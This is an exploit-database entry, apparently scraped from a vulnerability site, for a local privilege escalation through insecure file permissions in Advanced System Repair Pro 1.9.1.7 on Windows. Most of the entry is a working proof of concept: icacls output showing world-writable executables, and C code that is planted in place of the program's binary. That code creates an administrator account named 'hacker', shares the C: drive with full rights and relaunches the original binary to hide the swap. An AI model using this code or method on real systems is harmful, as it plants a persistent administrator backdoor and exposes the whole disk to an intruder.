header-logo
Suggest Exploit
vendor:
Advanced System Repair Pro
by:
ZwX
7.2
CVSS
HIGH
Insecure File Permissions
264
CWE
Product Name: Advanced System Repair Pro
Affected Version From: 1.9.1.7
Affected Version To: 1.9.1.7
Patch Exists: NO
Related CWE: N/A
CPE: a:advanced_system_repair:advanced_system_repair_pro
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2020

Advanced System Repair Pro 1.9.1.7 – Insecure File Permissions

Advanced System Repair Pro 1.9.1.7 is vulnerable to insecure file permissions. An attacker can exploit this vulnerability by compiling a malicious 'C' code and renaming the original 'AdvancedSystemRepairPro.exe' to '~AdvancedSystemRepairPro.exe'. The malicious code can then be placed in the Advanced System Repair Pro 1.9.1.7.0 directory. When a more privileged user connects and uses the AdvancedSystemRepairPro IDE, the attacker can gain privilege escalation.

Mitigation:

Ensure that all files and directories have the correct permissions set.
Source

Exploit-DB raw data:

# Exploit Title: Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2020-01-12
# Vendor Homepage : https://advancedsystemrepair.com/
# Software Link: http://advancedsystemrepair.com/ASRProInstaller.exe
# Tested on OS: Windows 10


# Proof of Concept (PoC):
==========================

C:\Program Files\Advanced System Repair Pro 1.9.1.7.0>icacls *.exe
AdvancedSystemRepairPro.exe Everyone:(F)
                            AUTORITE NT\Système:(I)(F)
                            BUILTIN\Administrateurs:(I)(F)
                            BUILTIN\Utilisateurs:(I)(RX)
							
dsutil.exe Everyone:(F)
           AUTORITE NT\Système:(I)(F)
           BUILTIN\Administrateurs:(I)(F)
           BUILTIN\Utilisateurs:(I)(RX)
		   
tscmon.exe Everyone:(F)
           AUTORITE NT\Système:(I)(F)
           BUILTIN\Administrateurs:(I)(F)
           BUILTIN\Utilisateurs:(I)(RX)
							
		 
#Exploit code(s): 
=================

1) Compile below 'C' code name it as "AdvancedSystemRepairPro.exe"

#include<windows.h>

int main(void){
 system("net user hacker abc123 /add");
 system("net localgroup Administrators hacker  /add");
 system("net share SHARE_NAME=c:\ /grant:hacker,full");
 WinExec("C:\\Program Files\\Advanced System Repair Pro 1.9.1.7.0\\~AdvancedSystemRepairPro.exe",0);
return 0;
} 

2) Rename original "AdvancedSystemRepairPro.exe" to "~AdvancedSystemRepairPro.exe"
3) Place our malicious "AdvancedSystemRepairPro.exe" in the Advanced System Repair Pro 1.9.1.7.0 directory
4) Disconnect and wait for a more privileged user to connect and use AdvancedSystemRepairPro IDE. 
Privilege Successful Escalation

Navigation

Suggest Exploit

Services By CQR